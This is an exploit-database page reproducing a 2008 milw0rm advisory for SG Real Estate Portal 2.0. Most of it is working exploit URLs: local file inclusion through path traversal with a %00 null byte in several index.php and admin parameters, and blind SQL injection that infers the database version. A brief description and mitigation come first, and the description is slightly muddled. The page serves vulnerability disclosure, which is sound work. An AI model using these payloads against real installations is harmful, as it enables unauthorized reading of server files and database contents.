SG Real Estate Portal 2.0 Blind SQL Injection/Local File Inclusion

vendor:

SG Real Estate Portal

by:

SirGod

7.5

CVSS

HIGH

Blind SQL Injection/Local File Inclusion

CWE

Product Name: SG Real Estate Portal

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2020

SG Real Estate Portal 2.0 Blind SQL Injection/Local File Inclusion

SG Real Estate Portal 2.0 is vulnerable to Blind SQL Injection/Local File Inclusion. An attacker can exploit this vulnerability by sending malicious requests to the server. For example, an attacker can send a malicious request to the server with a Local File parameter containing a relative path to the file they want to access. This can be done by appending %00 to the end of the malicious request. This vulnerability can be exploited by an attacker to gain access to sensitive information stored on the server.

Mitigation:

To mitigate this vulnerability, the application should validate user input and filter out any malicious requests. Additionally, the application should be configured to only allow access to files that are necessary for the application to function.

Source

Exploit-DB raw data:

#################################################################################################################
[+] SG Real Estate Portal 2.0 Blind SQL Injection/Local File Inclusion
[+] Discovered By SirGod
[+] MorTal TeaM
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
#################################################################################################################

script: http://serverfree.org/download.php?file=347076

[+] Local File Inclusion

   - Note : For PoC's 4,5 you need administrative permissions.
            Don't forget to put / before the local file in poc 2,3 .

-----------------------------------------------------------------------------------------------------------------

   Example 1 :

     http://[target]/[path]/index.php?mod=[Local File]%00

   PoC 1 :

     http://127.0.0.1/path/index.php?mod=../../../../autoexec.bat%00

-----------------------------------------------------------------------------------------------------------------

   Example 2 :

     http://[target]/[path]/index.php?page=/[Local File]%00


   PoC 2 :

     http://127.0.0.1/path/index.php?page=/../../../../autoexec.bat%00

-----------------------------------------------------------------------------------------------------------------

   Example 3 :


     http://[target]/[path]/index.php?lang=/[Local File]%00&page_id=106

   PoC 3 :

     http://127.0.0.1/path/index.php?lang=/../../../../autoexec.bat%00&page_id=106

-----------------------------------------------------------------------------------------------------------------

   Example 4 :


     http://[target]/[path]/admin/index.php?category=security&action=[Local
File]%00

   PoC 4 :

     http://127.0.0.1/path/admin/index.php?category=security&action=../../../../../autoexec.bat%00

-----------------------------------------------------------------------------------------------------------------

   Example 5 :


     http://[target]/[path]/admin/index.php?category=security&folder=[Local
File]%00&page=params&id=8

  PoC 5 :

     http://127.0.0.1/path/admin/index.php?category=security&folder=../../../../../autoexec.bat%00&page=params&id=8

-----------------------------------------------------------------------------------------------------------------

 [+] Blind SQL Injection


  Example :


     http://127.0.0.1/path/index.php?lang=EN&page_id=106 and 1=1

     http://127.0.0.1/path/index.php?lang=EN&page_id=106 and 1=2

-----------------------------------------------------------------------------------------------------------------

  PoC :


     http://127.0.0.1/path/index.php?lang=EN&page_id=106 and
substring(@@version,1,1)=5

     http://127.0.0.1/path/index.php?lang=EN&page_id=106 and
substring(@@version,1,1)=4

-----------------------------------------------------------------------------------------------------------------

#################################################################################################################

# milw0rm.com [2008-09-30]